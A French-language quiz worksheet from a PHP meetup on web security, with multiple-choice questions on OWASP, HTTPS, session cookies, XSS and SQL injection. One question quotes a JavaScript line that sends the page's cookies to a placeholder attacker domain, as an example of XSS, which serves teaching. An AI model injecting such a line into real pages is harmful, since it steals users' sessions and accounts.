WorksheetsPHP Tours Meetup #27 Sécurité et vulnérabilités Web
Total questions: 9
Worksheet time: 4mins
(Question Gratuite) A propos de la conférence de ce soir:
J'ai appris beaucoup de choses cools!
Ca m'a permis de réviser mes connaisances!
Je connaissais déjà tout!
Je viens voir les organisateurs pour faire la prochaine conférence sur la sécurité!
Que signifie l'acronyme "OWASP" ?
Organisation for World Acknowledgment of Security Principle
Of Web And Security Policy
Open Web Application Security Project
Omega Werewolf And the Super Poney
Quelle est la catégorie placée en haut du TOP 10 de l'OWASP (version 2021) ?
Contrôles d'accès défaillants
Mauvaise configuration de sécurité
Identification et authentification de mauvaise qualité
Supervision et Journalisation Insuffisantes
Si je navigue sur un site en HTTPS je suis 100% à l'abri de tout piratage.
Vrai
Faux
Il peut suffire d'un cookie de session pour accéder au compte d'une personne sans connaître ses identifiants (login/mot de passe)
Vrai
Faux
Laquelle de ces mesures N'aiderait PAS à limiter la possibilité d'un vol de cookie ?
Utiliser l'attribut "HttpOnly"
Limiter la durée de vie des cookies
Filtrer les données soumises par les utilisateurs avant de les stocker
Imposer un changement de mot de passe tous les mois
Il n'y a que par le biais des sites Web que l'ont peut se faire pirater
Vrai
Faux
> (new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;
La ligne de code ci-dessus est typique d'une attaque de type:
Injection SQL
Cross-site scripting (XSS)
Brute force
Man in the middle
Quelle est, pour vous, la meilleure proposition pour éviter les failles de type "injection SQL" ?
Utiliser une base NoSQL
Ne pas mettre de formulaire sur son site
Utiliser un ORM pour gérer les requêtes à la base
Venir aux meetup de l'AFUP sur la sécurité
